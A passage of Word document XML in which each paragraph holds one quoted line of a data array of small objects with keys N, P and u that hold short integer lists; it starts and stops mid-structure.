        <w:t>&gt;&gt;         u: [3, 49, 121]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F800E3D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAF0385" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B26B21F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468C40EE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 35]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA3B312" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C196D63" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5686637A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA32A77" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA10DB2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F971FE2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AF001C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA4184C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [15]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61450B8D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D90873" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1125F0A8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778E1E71" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [10]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2232C4D9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B66C9C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417163DB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36109177" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A951F5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB9E1AB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1349C5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B01CC94" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F122493" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7612214C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3094513A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FCF836" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [57, 106, 189, 344, 354]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CAF6CD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006ADF62" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F085BF7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBCD066" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C93AAD7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580DCAC4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24289C78" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45076436" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 2, 3, 5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479C436F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D3CEAB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AC4BB0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4, 5, 6, 7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E08969" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25045F42" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C71FD9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791D9C7F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0009BE15" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 13]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CDEE8B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474505D7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [6, 0, 2, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFDEB35" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5135194F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [269, 324]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D18C95B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF1AA36" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641BA0B9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F1C183" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F996C12" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD3D232" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283391F8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D73ADB6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DBF80F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C8223A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 7, 5, 2, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D5EF8E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5853BDF3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAB094B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9038F1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE56651" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D931981" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4628CD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4198307E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06891A88" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CB9531" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21276513" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5D4F6F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BD44BE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D030AC3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 13, 90, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C0973B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F769BB5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44405076" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725B934F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 114]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2F32BD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BA4C03" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D02D048" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFD0EAE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 6, 17, 19]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A290FB6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444CA58A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B77729A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4074651F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [196]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5834AC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE97F3A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC2BE9F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601798A0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04471B2E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EA5A26" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5791449C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B020895" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [7, 10, 16, 18, 178, 288]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18103C42" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E47AD5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75490276" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF054D8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [210, 305]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF38C33" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C568765" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E952C18" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC97F0B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1B992C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CFEE1A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EE0900" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         g: 5,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDC2FA0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201BD2D0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66732630" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 8, 11, 16, 101, 235]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8CFB37" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8E6FE1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C66F118" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343BDDD7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BA5CD1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4387A45A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B8F639" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CAC744" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754B5E61" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6770B7E8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4C251B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0638773F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [1, 15, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4357B8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158911A7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4676E50C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [4, 5, 12, 13, 15, 16, 17, 18, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3DCBBC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 2, 3, 6, 7, 8, 9, 10, 11, 14, 19, 20, 159, 168, 186, 245, 272, 285, 311, 317, 338, 348, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBDC4FD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3AE1A4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EF5893" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0025CCF5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 2, 4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45348668" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B150E7D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D996F2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
